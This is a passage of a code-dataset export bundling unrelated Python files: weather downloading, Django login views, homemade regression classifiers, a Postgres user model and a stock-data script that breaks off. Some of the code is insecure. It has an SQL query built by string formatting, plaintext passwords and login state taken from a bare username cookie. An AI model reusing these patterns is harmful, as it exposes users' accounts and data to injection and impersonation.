multiple at same airport)\n    msk3 = airport_total['CALL'].duplicated().values\n    print('Duplicated values for:')\n    print(airport_total[msk3][['CALL','City']])\n    airport_total=airport_total[~msk3]\n    # msk1 = airport_codes2['USAF']!=999999\n    # msk2 = airport_codes2['WBAN']!=99999\n    # airport_codes2=airport_codes2[msk1&msk2]\n    \n    #make these codes integers.\n    airport_total['USAF']=airport_total['USAF'].astype(int)\n    airport_total['WBAN']=airport_total['WBAN'].astype(int)\n    \n    return airport_total\n\ndef plot_airports(air_df):\n    \"\"\"plot_airports(air_df)\n    Plot the locations of the airports contained within air_df.\n    Useful for eyeballing if there are systematic flaws in the locations \n    that made the cut.\n    \"\"\"\n    # try:\n    #     m=pickle.load(open('usstates.pickle','rb'))\n    #     print('Loading Map from pickle')\n    # except:\n    #if not, remake the Basemap (costs lots of time)\n    try:\n        plt.figure() \n        print('Creating Fine BaseMap and storing with pickle')\n        m=Basemap(projection='merc',llcrnrlon=-130,llcrnrlat=25,\n                  urcrnrlon=-65,urcrnrlat=50,resolution='l', \n                  lon_0=-115, lat_0=35)\n        m.drawstates()\n        m.drawcountries()\n        m.drawcoastlines()\n        pickle.dump(m,open('usstates.pickle','wb'),-1)\n    except Exception as exc:\n        # fixed: this branch printed the undefined name 'meh' (a NameError);\n        # report the failure and bail out, since 'm' is unusable past this point\n        print('could not create Basemap:', exc)\n        return None\n    #actually draw the map\n    lons = air_df['LON'].values\n    lats = air_df['LAT'].values\n    m.scatter(lons,lats,latlon=True)\n    plt.show()\n    return None\n\n#now download the data from NOAA:\ndef wget_data(USAF,WBAN,yearstr,city,airport):\n    \"\"\"wget_data(USAF,WBAN,yearstr,city,airport)\n    Download automated weather station data from NOAA for a given year at a given airport.\n    \n    USAF: USAF 6 digit code for airport.\n    WBAN: NOAA code for weather station at airport\n    yearstr: a string containing the 4 digit year.\n    city: city the airport is located in\n    airport: Name of the airport.\n    \"\"\"\n    base_url='ftp://ftp.ncdc.noaa.gov/pub/data/noaa/isd-lite/'\n    file_name=isd_filename(yearstr,USAF,WBAN)\n    url=base_url+file_name\n    try:\n        print('\\n trying: {}'.format(url))\n        wget.download(url,out='data/ISD')\n    except:\n        print('\\n could not download data from city:',city,airport)\n    return None\n\ndef isd_filename(yearstr,USAF,WBAN):\n    \"\"\" isd_filename(yearstr,USAF,WBAN)\n    Make filename corresponding to zipped file names used in ISD database.\n    \"\"\"\n    #put in some padding {:0>5} for shorter codes.\n    fn=\"{0}/{1}-{2:0>5}-{0}.gz\".format(yearstr,str(USAF),str(WBAN))\n    return fn\n    \n#download weather data for all of the airports specified in aircode\ndef get_all_data(aircode,years=['2015','2016','2017']):\n    \"\"\"get_all_data(aircode,years=['2015','2016','2017'])\n    Download the data for all airports we could find weather stations for in desired cities.\n\n    aircode: dataframe containing airport codes, NOAA station numbers, airports\n    years: array of strings for the years to seek data.\n    \"\"\"\n    for yearstr in years:\n        for i in range(len(aircode)):\n            ap = aircode.iloc[i]\n            usaf=ap['USAF']\n            wban=ap['WBAN']\n            city=ap['City']\n            airport=ap['Name']\n            wget_data(usaf,wban,yearstr,city,airport)\n    return None\n\n#now read it in, convert to time-series.\n\ndef convert_isd_to_df(filename,city,state):\n    \"\"\"\n    convert_to_df(filename)\n    \n    Read in automated weather station data from file.\n    Data is space separated columns, with format given in\n    \"isd-lite-format.txt\".\n    Converts to pandas dataframe using date/time columns as DateTimeIndex.\n    Format info:\n    1: Year\n    2: Month\n    3: Day\n    4: Hour \n    5: Temperature (x10) in celsius\n    6: Dew point temperature (x10) in celsius\n    7: Sea level pressure (x10 in hectopascals)\n 
8: Wind direction (degrees from north)\n 9: Wind speed (x10 in meters per second)\n 10: Cloud Coverage (categorical)\n 11: Precipitation for One Hour (x10, in mm)\n 12: Precipitation total for Six hours (x10 in mm)\n\n All missing values are -9999.\n \"\"\"\n #use fixed width format to read in (isd-lite-format has data format)\n col_names=['year','month','day','hour',\n 'Temp','DewTemp','Pressure',\n 'WindDir','WindSpeed','CloudCover',\n 'Precip-1hr','Precip-6hr']\n df=pd.read_fwf(filename,compression='gzip',\n na_values=['-9999','999'],names=col_names)\n city_st=city+', '+state\n df['city']=city\n df['state']=state\n df['city, state']=city_st\n df['region']=region_dict[state] \n #make a time index.\n times=pd.to_datetime({'year':df['year'],\n 'month':df['month'],\n 'day':df['day'],\n 'hour':df['hour']})\n Tindex=pd.DatetimeIndex(times)\n df.index=Tindex\n #df.index=pd.MultiIndex.from_product([Tindex,[city_st]])\n #delete those columns\n df=df.drop(labels=['year','month','day','hour'],axis=1)\n return df\n\n# fn = 'data/ISD/702650-26407-2015.gz'\n# city='Blah'\n# state='OR'\n \n# df=convert_isd_to_df(fn,city,state)\n\ndef convert_state_isd(air_df,ST):\n \"\"\"convert_all_isd(air_df)\n convert the weather files for a particular state into \n one big data frame.\n \"\"\"\n data_dir='data/ISD/'\n Tindex=pd.DatetimeIndex(start='2015-07',end='2017-11',freq='h')\n df_tot=pd.DataFrame(index=Tindex)\n #select out only the entries for the desired state.\n msk = air_df['State']==ST\n air_msk=air_df[msk]\n for i in range(len(air_msk)):\n for yearstr in ['2015','2016','2017']:\n ap = air_msk.iloc[i]\n usaf=ap['USAF']\n wban=ap['WBAN']\n city=ap['City']\n state=ap['State']\n file_name=\"data/ISD/{1}-{2:0>5}-{0}.gz\".format(yearstr,str(usaf),str(wban))\n df=convert_isd_to_df(file_name,city,state)\n df_tot=df_tot.append(df)\n print('done with {}'.format(ap['Name']))\n return df_tot\n\ndef convert_all_isd(air_df):\n \"\"\"convert_all_isd(air_df)\n convert all the weather files for all stations and all years into \n one big data frame.\n \"\"\"\n data_dir='data/ISD/'\n Tindex=pd.DatetimeIndex(start='2015-07',end='2017-11',freq='h')\n df_tot=pd.DataFrame(index=Tindex)\n nmax=len(air_df)\n for i in range(nmax):\n for yearstr in ['2015','2016','2017']:\n ap = air_df.iloc[i]\n usaf=ap['USAF']\n wban=ap['WBAN']\n city=ap['City']\n state=ap['State']\n file_name=\"data/ISD/{1}-{2:0>5}-{0}.gz\".format(yearstr,str(usaf),str(wban))\n df=convert_isd_to_df(file_name,city,state)\n df_tot=df_tot.append(df)\n print('done with {}'.format(ap['Name']))\n return df_tot\n\n# def make_weather_multiindex(air_df):\n# #Tindex=pd.DatetimeIndex(start='2015-07',end='2017-11',freq='h')\n# Tindex=pd.DatetimeIndex(start='2015-07',end='2016-03',freq='m') \n# city_list=list()\n# nmax=4;#len(air_df)\n# for i in range(nmax):\n# ap = air_df.iloc[i]\n# city=ap['City']\n# state=ap['State']\n# city_ST=city+', '+state\n# city_list.append(city_ST)\n# joint_index=pd.MultiIndex.from_product([Tindex,city_list])\n# return joint_index\n\n#make dataframes with codes.\ntry:\n air_df=pd.read_csv('data/air_code_df.gz')\nexcept:\n airport_codes=make_airport_df()\n isd_names=read_isd_df()\n air_df=merge_air_isd(airport_codes,isd_names)\n #write output to csv\n air_df.to_csv('data/air_code_df.gz',compression='gzip',header=True)\n\n#ind=make_weather_multiindex(air_df)\n \n##actually download the data from 2015-2017 from the stations listed in air_code_df. 
(takes a few minutes)\n#get_all_data(air_df)\n\n# d0=convert_all_isd(air_df)\n# # #converted file to csv to save time.\n# d0.to_csv('data/airport_weather.gz',compression='gzip',header=True)\n","sub_path":"util/get_weather_data.py","file_name":"get_weather_data.py","file_ext":"py","file_size_in_byte":15271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"56449470","text":"# -*- encoding:utf-8 -*-\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import auth\nfrom HippoWeb.forms import LoginForm\nimport rsa\nimport json\n\n\ndef page_not_found(request, **kwargs):\n    from django.shortcuts import render_to_response\n    response = render_to_response('404.html')\n    response.status_code = 404\n    return response\n\n\ndef server_error(request, **kwargs):\n    from django.shortcuts import render_to_response\n    response = render_to_response('50x.html')\n    response.status_code = 500\n    return response\n\n\ndef rsa_encrypt(req):\n    \"\"\"Generate an RSA key pair and store the private key, split into its parts.\"\"\"\n    (public, private) = rsa.newkeys(512)\n    private_key = dict()\n    private_key['n'] = private.n\n    private_key['e'] = private.e\n    private_key['d'] = private.d\n    private_key['p'] = private.p\n    private_key['q'] = private.q\n    req.session['privkey'] = private_key  # the session lives in the django_session table\n    pub_e = hex(public.e).split('0x')[1]  # convert to hex and strip the leading 0x\n    pub_n = hex(public.n).split('0x')[1]\n    # print(pub_e)\n    # print(pub_n)\n    pubkey = {'pub_e': pub_e, 'pub_n': pub_n}\n    return pubkey\n\n\ndef rsa_privkey(req):\n    \"\"\"Rebuild the private key from the session.\"\"\"\n    priv = req.session.get('privkey')\n    privkey = rsa.PrivateKey(priv['n'],\n                             priv['e'],\n                             priv['d'],\n                             priv['p'],\n                             priv['q'])\n    return privkey\n\n\ndef login(req):\n    \"\"\"Return the login page form.\"\"\"\n    login_user = req.COOKIES.get('username')\n    if login_user:\n        return redirect('/index/')\n    pubkey = rsa_encrypt(req)\n    pub_e = pubkey['pub_e']\n    pub_n = pubkey['pub_n']\n    login_form = LoginForm()\n    return render(req, 'login.html', {'login_form': login_form, 'pub_e': pub_e, 'pub_n': pub_n})\n\n\ndef checklogin(req):\n    \"\"\"Validate the submitted login data.\"\"\"\n    if req.is_ajax():\n        if req.method == 'POST':\n            username = req.POST.get('username', None)\n            en_password = req.POST.get('en_password', None)\n            if en_password:\n                # RSA decryption is shelved for now and not implemented\n                password = req.POST.get('password', None)\n                # privkey = rsa_privkey(req)\n                # on py2 use en_password.decode('hex')\n                # password = rsa.decrypt(bytes.fromhex(en_password), privkey)\n                # req.session['privkey'] = None\n                user = auth.authenticate(username=username, password=password)\n                if user:\n                    auth.login(req, user)\n                    response = HttpResponse(json.dumps({'data': \"ok\"}))\n                    response.set_cookie('username', user)\n                    return response\n                else:\n                    response = HttpResponse(json.dumps({'data': \"error\"}))\n                    return response\n                # TODO: report the username/password check back to the frontend\n\n\ndef logout(req):\n    \"\"\"Log out the currently logged-in user.\"\"\"\n    login_user = req.COOKIES.get('username')\n    if login_user:\n        response = redirect('/login/')\n        response.delete_cookie('username')\n        auth.logout(req)\n        return response\n    else:\n        return redirect('/login/')\n\n\n@login_required\ndef index(req):\n    \"\"\"Home page: check whether the user is logged in; redirect to the login page if not.\"\"\"\n    try:\n        login_user = req.COOKIES.get('username')\n        if login_user:\n            return render(req, 'index.html')\n        else:\n            return redirect('/login/')\n    except Exception as error:\n 
print(error)\n","sub_path":"HippoWeb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486213675","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator\nfrom sklearn.metrics import r2_score, accuracy_score\nfrom sklearn.datasets import load_boston, load_breast_cancer, load_digits, load_wine\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression as sklearn_LogisticRegression\nimport copy\n\nclass LinearRegression(BaseEstimator):\n def __init__(self, fit_intercept=True):\n super().__init__()\n self.fit_intercept = fit_intercept\n\n def init_params(self, X, Y):\n self.X = X.copy()\n self.Y = Y.copy()\n\n def add_ones(self, X):\n if self.fit_intercept:\n ones = np.ones((X.shape[0], 1))\n return np.hstack((ones, X))\n return X\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n tmp_X = self.add_ones(X)\n\n tmp_X = np.mat(tmp_X)\n tmp_Y = np.mat(self.Y).T\n\n XTX = tmp_X.T * tmp_X\n if np.linalg.det(XTX) == 0:\n raise ZeroDivisionError\n\n self.W = XTX.I * tmp_X.T * tmp_Y\n if self.fit_intercept:\n self.coef_ = np.ravel(self.W)[1:]\n self.intercept_ = np.ravel(self.W)[0]\n else:\n self.coef_ = self.W\n return self\n\n def predict(self, X):\n tmp_X = self.add_ones(X)\n tmp_X = np.mat(tmp_X)\n Y_pred = tmp_X * self.W\n return np.ravel(Y_pred)\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return r2_score(Y, Y_pred)\n\nclass Ridge(BaseEstimator):\n def __init__(self,\n learning_rate = 0.01, max_iter = 500, tol = 1e-4,\n solver = 'Batch', fit_intercept = True, alpha = 1\n ):\n super().__init__()\n self.learning_rate = learning_rate\n self.max_iter = max_iter\n self.tol = tol\n self.solver = solver\n self.fit_intercept = fit_intercept\n self.alpha = alpha\n\n def init_params(self, X, Y):\n self.X = X.copy()\n self.Y = Y.copy()\n self.std = StandardScaler().fit(self.X)\n self.X = self.std.transform(self.X)\n self.W = np.mat(np.zeros((self.X.shape[1] + 1, 1)))\n self.GD_dict = {'Batch' : self._cal_grad_Batch,\n 'Stocastic' : self._cal_grad_Stocastic,\n 'Mini' : self._cal_grad_Mini}\n\n def add_ones(self, X):\n if self.fit_intercept:\n ones = np.ones((X.shape[0], 1))\n return np.hstack((ones, X))\n return X\n\n def _cal_grad_Batch(self, X, Y):\n return 2 / X.shape[0] * (X.T * (X * self.W - Y) + self.alpha * self.W)\n\n def _cal_grad_Stocastic(self, X, Y):\n j = np.random.choice(range(X.shape[0]), 1)\n X_j, Y_j = X[j], Y[j]\n return 2 / X.shape[0] * (X_j.T * (X_j * self.W - Y_j) + self.alpha * self.W)\n\n def _cal_grad_Mini(self, X, Y):\n j = np.random.choice(range(X.shape[0]), 32)\n X_j, Y_j = X[j], Y[j]\n return 2 / X.shape[0] * (X_j.T * (X_j * self.W - Y_j) + self.alpha * self.W)\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n tmp_X = np.mat(self.add_ones(self.X))\n tmp_Y = np.mat(self.Y).T\n steps = 0\n\n while steps < self.max_iter:\n steps += 1\n gd = self.GD_dict[self.solver](tmp_X, tmp_Y)\n if gd.T * gd < self.tol:\n break\n self.W -= self.learning_rate * gd\n\n if self.fit_intercept:\n self.coef_ = np.ravel(self.W)[1:]\n self.intercept_ = np.ravel(self.W)[0]\n else:\n self.coef_ = self.W\n return self\n\n def predict(self, X):\n X = self.std.transform(X)\n tmp_X = self.add_ones(X)\n tmp_X = np.mat(tmp_X)\n Y_pred = tmp_X * self.W\n return np.ravel(Y_pred)\n\n def score(self, X, Y):\n Y_pred = 
self.predict(X)\n        return r2_score(Y, Y_pred)\n\nclass _LogisticRegression(BaseEstimator):\n    def __init__(self,\n                 tol = 1e-4, C = 1, fit_intercept = True, max_iter = 5000,\n                 learning_rate = 0.1, solver = 'sag'\n                 ):\n        super().__init__()\n        self.tol = tol\n        self.C = 1/C\n        self.fit_intercept = fit_intercept\n        self.max_iter = max_iter\n        self.learning_rate = learning_rate\n        self.solver = solver\n\n    def init_params(self, X, Y):\n        self.X = X.copy()\n        self.Y = Y.copy()\n        self.std = StandardScaler().fit(self.X)\n        self.X = self.std.transform(self.X)\n        if self.fit_intercept:\n            self.W = np.mat(np.zeros((self.X.shape[1] + 1, 1)))\n        else:\n            self.W = np.mat(np.zeros((self.X.shape[1], 1)))\n        self.delta_dict = {'sag' : self.SAG,\n                           'newton' : self.Newton}\n\n    def add_ones(self, X):\n        if self.fit_intercept:\n            ones = np.ones((X.shape[0], 1))\n            return np.hstack((ones, X))\n        return X\n\n    def sigmod(self, X, w):\n        z = X * w\n        return 1/(1 + np.exp(-z))\n\n    def cal_sigmoid_error(self, X, Y):\n        sigmod_result = self.sigmod(X, self.W)\n        error = sigmod_result - Y\n        return error, sigmod_result\n\n    def SAG(self, X, Y):\n        if self.solver == 'sag':\n            j = np.random.choice(range(X.shape[0]), 32)\n            X_j, Y_j = X[j], Y[j]\n        else:\n            X_j, Y_j = X, Y\n        error, sigmod_result = self.cal_sigmoid_error(X_j, Y_j)\n        gd = 1/X.shape[0] * (X_j.T * error + self.C * self.W)\n        if self.solver == 'sag':\n            return gd\n        elif self.solver == 'newton':\n            return gd, sigmod_result\n\n    def Hessian(self, X, sigmod_result):\n        sigmod_result = np.ravel(sigmod_result)\n        # fixed: the Newton step needs diag(p * (1 - p)), not diag(p),\n        # for the Hessian of the regularized logistic loss\n        B = np.diag(sigmod_result * (1 - sigmod_result))\n        return 1/X.shape[0] * X.T * B * X + self.C * np.eye(X.shape[1])\n\n    def Newton(self, X, Y):\n        gd, sigmod_result = self.SAG(X, Y)\n        H = self.Hessian(X, sigmod_result)\n        return H.I * gd\n\n    def fit(self, X, Y):\n        self.init_params(X, Y)\n        tmp_X = np.mat(self.add_ones(self.X))\n        tmp_Y = np.mat(self.Y).T\n        steps = 0\n\n        while steps < self.max_iter:\n            steps += 1\n            delta = self.delta_dict[self.solver](tmp_X, tmp_Y)\n            if delta.T * delta < self.tol:  # fixed: 'while ... break' never stopped the outer loop\n                break\n            if self.solver == 'sag':\n                self.W -= self.learning_rate * delta\n            elif self.solver == 'newton':\n                self.W -= delta\n\n        if self.fit_intercept:\n            self.coef_ = np.ravel(self.W)[1:]\n            self.intercept_ = np.ravel(self.W)[0]\n        else:\n            self.coef_ = self.W\n        self.iterations = steps\n        return self\n\n    def predict_proba(self, X):\n        X = self.std.transform(X)\n        tmp_X = np.mat(self.add_ones(X))\n        Y_proba_1 = self.sigmod(tmp_X, self.W)\n        Y_proba_0 = 1 - Y_proba_1\n        Y_proba = np.hstack((Y_proba_0, Y_proba_1))\n        return Y_proba\n\n    def predict(self, X):\n        Y_pred_proba = self.predict_proba(X)\n        return Y_pred_proba.argmax(axis = 1)\n\n    def score(self, X, Y):\n        Y_pred = self.predict(X)\n        return accuracy_score(Y, Y_pred)\n\n\nclass LogisticRegression(BaseEstimator):\n    def __init__(self,\n                 tol = 1e-4, C = 1, fit_intercept = True, max_iter = 5000,\n                 learning_rate = 0.1, solver = 'sag'\n                 ):\n        super().__init__()\n        self.tol = tol\n        self.C = C  # fixed: storing 1/C here inverted the penalty twice, since _LogisticRegression divides again\n        self.fit_intercept = fit_intercept\n        self.max_iter = max_iter\n        self.learning_rate = learning_rate\n        self.solver = solver\n        self.binary = True\n\n\n    def init_params(self, X, Y):\n        if len(np.unique(Y)) > 2:\n            self.binary = False\n            if len(Y.shape) == 1:\n                self.onehot = OneHotEncoder(sparse = False).fit(Y.reshape(-1, 1))\n                self.Y_ = self.onehot.transform(Y.reshape(-1, 1))\n\n        estimator_params = (\"tol\", \"C\", \"fit_intercept\",\n                            \"max_iter\", \"learning_rate\",\n                            \"solver\")\n        self.base_estimator_ = _LogisticRegression(**{p: getattr(self, p) for p in estimator_params})\n\n\n    def fit(self, X, Y):\n 
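        \"\"\"Fit the binary model directly; for multiclass targets, fit one one-vs-rest copy of the base estimator per class.\"\"\"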
self.init_params(X, Y)\n if self.binary:\n return self.base_estimator_.fit(X, Y)\n self.base_model_list = [copy.deepcopy(self.base_estimator_.fit(X, Y_class)) for Y_class in self.Y_.T]\n return self\n\n def predict_proba(self, X):\n Y_pred_proba = np.array(np.hstack([model.predict_proba(X)[:, -1].reshape(-1,1) for model in self.base_model_list]))\n row_sum = Y_pred_proba.sum(axis = 1).reshape(-1,1)\n return Y_pred_proba/row_sum\n\n def predict(self, X):\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\nclass _Perceptron(BaseEstimator):\n def __init__(self, gaussian_kernel=True,\n normalize = True,\n max_iter = 500,\n gamma = 1e-2,\n predict_probability=True,\n Log_model = 'sklearn'\n ):\n super().__init__()\n self.gaussian_kernel = gaussian_kernel\n self.normalize = normalize\n self.max_iter = max_iter\n self.gamma = gamma\n self.predict_probability = predict_probability\n self.Log_model = Log_model\n\n def init_params(self, X, Y):\n self.N, self.M = X.shape\n self.X = X.copy()\n self.Y = Y.copy()\n self.Y[self.Y == 0] = -1\n\n if self.normalize:\n self.stand = StandardScaler().fit(self.X)\n self.X = self.stand.transform(self.X)\n\n self.a = np.zeros(self.N)\n self.Gram_matrix = self.Kernel(self.X, self.X)\n\n\n def _gaussian_dot(self, X_i, X_j):\n return np.exp(-self.gamma * ((X_i - X_j) ** 2).sum())\n\n def Kernel(self, X1, X2):\n N = X1.shape[0]\n M = X2.shape[0]\n if self.gaussian_kernel:\n Gram_matrix = np.zeros((N, M))\n for i in range(N):\n X_i = X1[i, :]\n for j in range(M):\n X_j = X2[j, :]\n Gram_matrix[i, j] = self._gaussian_dot(X_i, X_j)\n else:\n Gram_matrix = X1 @ X2.T\n return Gram_matrix\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n steps = 0\n while steps < self.max_iter:\n steps += 1\n missing_index = -1\n for j in range(self.X.shape[0]):\n checking = self.Y[j] * ((self.a * self.Y * self.Gram_matrix[j, :]).sum() + self.a @ self.Y)\n if checking <= 0:\n missing_index = j\n break\n if missing_index == -1:\n break\n self.a[missing_index] += 1\n\n if self.predict_probability:\n X_log = self.decision_function(self.X).reshape(-1, 1)\n self.std = StandardScaler().fit(X_log)\n X_log = self.std.transform(X_log)\n if self.Log_model == 'sklearn':\n self.logistic_model = sklearn_LogisticRegression(solver='lbfgs').fit(X_log, self.Y)\n elif self.Log_model == 'fakesklearn':\n self.logistic_model = LogisticRegression(solver='newton').fit(X_log, self.Y)\n self.steps = steps\n return self\n\n def _predict_dis(self, col):\n return (self.a * self.Y * col).sum() + self.a @ self.Y\n\n def decision_function(self, X):\n pred_Gram_matrix = pd.DataFrame(self.Kernel(self.X, X))\n X_log = pred_Gram_matrix.apply(self._predict_dis, axis=0).values\n return X_log\n\n def predict_proba(self, X):\n if self.normalize:\n X = self.stand.transform(X)\n X_log = self.decision_function(X).reshape(-1, 1)\n X_log = self.std.transform(X_log)\n return self.logistic_model.predict_proba(X_log)\n\n def predict(self, X):\n if self.predict_probability:\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n Y_pred = np.sign(self.decision_function(X))\n Y_pred[Y_pred == -1] = 0\n return Y_pred\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\nclass Perceptron(BaseEstimator):\n def __init__(self,\n gaussian_kernel=True,\n normalize=True,\n max_iter=500,\n gamma=1e-2,\n predict_probability=True,\n Log_model='sklearn'\n ):\n 
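        \"\"\"One-vs-rest wrapper around the kernel perceptron; the Gaussian kernel and probability calibration are optional.\"\"\"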
super().__init__()\n self.gaussian_kernel = gaussian_kernel\n self.normalize = normalize\n self.max_iter = max_iter\n self.gamma = gamma\n self.predict_probability = predict_probability\n self.Log_model = Log_model\n self.binary = True\n\n def init_params(self, X, Y):\n if len(np.unique(Y)) > 2:\n self.predict_probability = True\n self.binary = False\n if len(Y.shape) == 1:\n self.onehot = OneHotEncoder(sparse = False).fit(Y.reshape(-1, 1))\n self.Y_ = self.onehot.transform(Y.reshape(-1, 1))\n\n estimator_params = (\"gaussian_kernel\", \"normalize\", \"max_iter\",\n \"gamma\", \"predict_probability\",\n \"Log_model\")\n self.base_estimator_ = _Perceptron(**{p: getattr(self, p) for p in estimator_params})\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n if self.binary:\n return self.base_estimator_.fit(X, Y)\n self.base_model_list = [copy.deepcopy(self.base_estimator_.fit(X, Y_class)) for Y_class in self.Y_.T]\n return self\n\n def predict_proba(self, X):\n Y_pred_proba = np.array(np.hstack([model.predict_proba(X)[:, -1].reshape(-1,1) for model in self.base_model_list]))\n row_sum = Y_pred_proba.sum(axis = 1).reshape(-1,1)\n return Y_pred_proba/row_sum\n\n def predict(self, X):\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\n\nif __name__ == '__main__':\n boston = load_boston()\n X = boston['data']\n Y = boston['target']\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(X, Y, test_size=0.3, random_state = 43)\n\n LR = LinearRegression().fit(Xtrain, Ytrain)\n print(LR.score(Xtrain, Ytrain), LR.score(Xtest, Ytest))\n\n ridge = Ridge(max_iter = 5000, solver = 'Mini', learning_rate = 0.1, alpha = 0.5).fit(Xtrain, Ytrain)\n print(ridge.score(Xtrain, Ytrain), ridge.score(Xtest, Ytest))\n\n # bc = load_breast_cancer()\n # bc = load_digits(n_class=2)\n bc = load_wine()\n X = bc['data']\n Y = bc['target']\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(X, Y, test_size=0.3, random_state=42)\n\n LogR = LogisticRegression().fit(Xtrain, Ytrain)\n print(LogR.score(Xtrain, Ytrain), LogR.score(Xtest, Ytest))\n\n Perp = Perceptron(gaussian_kernel = True).fit(Xtrain, Ytrain)\n print(Perp.score(Xtrain, Ytrain), Perp.score(Xtest, Ytest))\n\n\n print('done')","sub_path":".history/fakesklearn/linear_model_20201202210159.py","file_name":"linear_model_20201202210159.py","file_ext":"py","file_size_in_byte":15246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492836766","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 4 08:30:49 2021\r\n\r\n@author: hp\r\n\"\"\"\r\nimport os\r\nimport psycopg2\r\n\r\nclass UserModel():\r\n TABLE_NAME = 'user_dtls'\r\n DATABASE_URL = os.environ['DATABASE_URL'] \r\n \r\n def __init__(self, _id, nameu, email, pwd, admin):\r\n print('DATABASE_URL:',self.DATABASE_URL)\r\n self.id = _id\r\n self.nameu = nameu\r\n self.email = email\r\n self.pwd = pwd\r\n self.admin = admin\r\n \r\n def json(self):\r\n return {\"id\": self.id, \r\n \"nameu\": self.nameu,\r\n \"email\": self.email,\r\n \"pwd\": self.pwd,\r\n \"admin\": self.admin\r\n }\r\n \r\n @classmethod\r\n def get_by_email(cls, email): \r\n connection = psycopg2.connect(cls.DATABASE_URL) \r\n cursor = connection.cursor()\r\n query = \"SELECT id, nameu, email, pwd, admin FROM {0} WHERE email='{1}'\".format(cls.TABLE_NAME,email)\r\n print(\"\\nquery @UserModel @get_by_email:\",query)\r\n cursor.execute(query)\r\n \r\n row = 
cursor.fetchone()\r\n        if row:\r\n            print(row)\r\n            user = cls(*row)\r\n        else:\r\n            print(\"no results fetched\")\r\n            user = None\r\n\r\n        connection.close()\r\n        return user\r\n    @classmethod\r\n    def get_by_id(cls, _id): \r\n        connection = psycopg2.connect(cls.DATABASE_URL) \r\n        \r\n        cursor = connection.cursor()\r\n        # parameterized query (avoids SQL injection; only the table name is interpolated)\r\n        query = \"SELECT id, nameu, email, pwd, admin FROM {0} WHERE id=%s\".format(cls.TABLE_NAME)\r\n        #print(\"\\nquery @UserModel @get_by_id:\",query)\r\n        cursor.execute(query, (_id,))\r\n        \r\n        row = cursor.fetchone()\r\n        if row:\r\n            print(row)\r\n            user = cls(*row)\r\n        else:\r\n            print(\"no results fetched\")\r\n            user = None\r\n\r\n        connection.close()\r\n        return user\r\n    @classmethod\r\n    def get_list(cls):\r\n        \r\n        print('DATABASE_URL:',cls.DATABASE_URL) \r\n        connection = psycopg2.connect(cls.DATABASE_URL) \r\n        \r\n        cursor = connection.cursor()\r\n        query = \"SELECT id, nameu, email, pwd, admin FROM {0}\".format(cls.TABLE_NAME)\r\n        print(\"\\nquery @UserModel @get_list:\",query)\r\n        cursor.execute(query)\r\n        \r\n        rows = cursor.fetchall()\r\n        ul=[]\r\n        for row in rows:\r\n            #print(row)\r\n            user = cls(*row)\r\n            ul.append(user)\r\n            print(user.json())\r\n        connection.close()\r\n        return ul\r\n    def save_to_db(self): \r\n        connection = psycopg2.connect(self.DATABASE_URL) \r\n        \r\n        cursor = connection.cursor()\r\n        # parameterized INSERT for the same reason\r\n        query = \"INSERT INTO {0}(nameu, email, pwd, admin) VALUES (%s,%s,%s,%s)\".format(self.TABLE_NAME)\r\n        print(\"\\nquery @UserModel @save_to_db:\",query)\r\n        cursor.execute(query, (self.nameu, self.email, self.pwd, self.admin))\r\n        connection.commit()\r\n\r\n        connection.close()\r\n        return True\r\n    ","sub_path":"Models/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"591100611","text":"\n# For example, point A at (12, 5) lies in quadrant 1 because both its x- and y-coordinates are positive, while point B, whose x-coordinate is negative and y-coordinate is positive, lies in quadrant 2.\n# Write a program that reads the coordinates of a point and determines which quadrant the point belongs to. 
Note: you may assume that the x- and y-coordinates are always nonzero (each is either positive or negative).\n\nx = int(input())\ny = int(input())\n\nif x > 0:\n    if y > 0:\n        print(1)\n    else:\n        print(4)\nelse:\n    if y > 0:\n        print(2)\n    else:\n        print(3)\n","sub_path":"BaekJoon/if/if_4.py","file_name":"if_4.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389986640","text":"from keys import ameritrade\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport requests, time, re, pickle\nimport pandas\nimport os\n\nfiles_data = []\n\ndef writeStockData():\n    url = \"https://api.tdameritrade.com/v1/instruments\"\n\n    stock_list = pandas.read_csv('company_lists.csv', usecols=['Symbol']).values.tolist()\n\n    start = 0\n    end = 500\n\n    while start < len(stock_list):\n        if len(stock_list) < end:\n            symbols = stock_list[start:len(stock_list)]\n        else:\n            symbols = stock_list[start:end]\n        \n        payload = {'apikey': ameritrade[\"Consumer Key\"],\n                'symbol': symbols,\n                'projection': 'fundamental'}\n\n        results = requests.get(url, params=payload)\n\n        data = results.json()\n        file_name = str(time.asctime()) + '.pkl'\n        file_name = re.sub('[ :]', '_', file_name)\n\n        files_data.append(file_name)\n\n        with open(file_name, 'wb') as 